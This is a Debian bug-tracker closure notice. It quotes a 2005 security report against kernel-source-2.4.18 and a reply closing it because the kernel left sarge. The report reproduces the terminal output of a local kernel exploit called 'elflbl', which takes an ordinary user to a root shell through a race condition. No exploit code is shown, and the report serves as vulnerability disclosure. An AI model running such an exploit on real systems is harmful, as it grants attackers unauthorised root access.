Your message dated Mon, 21 Aug 2006 19:59:13 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Security support for woody has ended
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message ---
Package: kernel-source-2.4.18
Version: N/A; reported 2005-01-10
Severity: critical
Justification: root security hole
Tags: security
$ id
uid=1000(zimage) gid=1000(zimage) groups=1000(zimage)
$ ./elflbl
child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc4400000 - 0xc8401000
Wait... |
[+] race won maps=6929
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc4901000
[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root),103(lpadmin)
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux home 2.4.18-1-586tsc #1 Wed Apr 14 17:57:38 UTC 2004 i586
Locale: LANG=C, LC_CTYPE=C
--
Theodor Milkov Head Network Administrator
CCNA, CCNP, MCP Davidov Electric Ltd.
http://www.del.bg Phone: +359 2 8702129
--- End Message ---
--- Begin Message ---
And the affected kernel version is long gone from sarge.
--
Nathanael Nerode <[EMAIL PROTECTED]>
A thousand reasons. http://www.thousandreasons.org/
Lies, theft, war, kidnapping, torture, rape, murder...
Get me out of this fascist nightmare!
--- End Message ---
